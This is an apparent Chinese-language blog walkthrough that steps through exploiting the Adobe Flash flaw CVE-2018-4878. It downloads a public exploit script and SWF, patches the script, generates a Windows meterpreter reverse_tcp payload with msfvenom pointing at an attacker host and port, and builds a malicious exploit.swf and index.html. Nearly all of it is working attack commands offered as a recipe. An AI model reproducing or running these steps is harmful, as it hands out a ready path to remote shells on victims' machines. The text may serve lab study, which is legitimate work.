cve-2018-4878

步骤过程

1.下载脚本利用

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar


2、下载安装rar解压工具

①.下载

wget https://www.rarlab.com/rar/rarlinux-x64-5.5.0.tar.gz 


②.解压

tar zxvf rarlinux-x64-5.5.0.tar.gz


③.安装

cd rar 

make

make install

3、解压脚本

解压前,先创建文件夹CVE-2018-4878

rar e CVE-2018-4878


.解压压缩文件后,可看到cve-2018-4878.py和exploit.swf。


4.修改cve-2018-4878.py

我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。

5.查找本机ip

ifconfig


6.生成shellcode.txt

生成shellcode.txt可以查看kali的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.130 LPORT=4444 -f python>shellcode.txt

cat shellcode.txt

查看shellcode,并替换cve-2018-4878里面原来的shellcode,修改路径


生成要用的exploit.swf和index.html

python cve-2018-4878.py






你可能感兴趣的:(cve-2018-4878)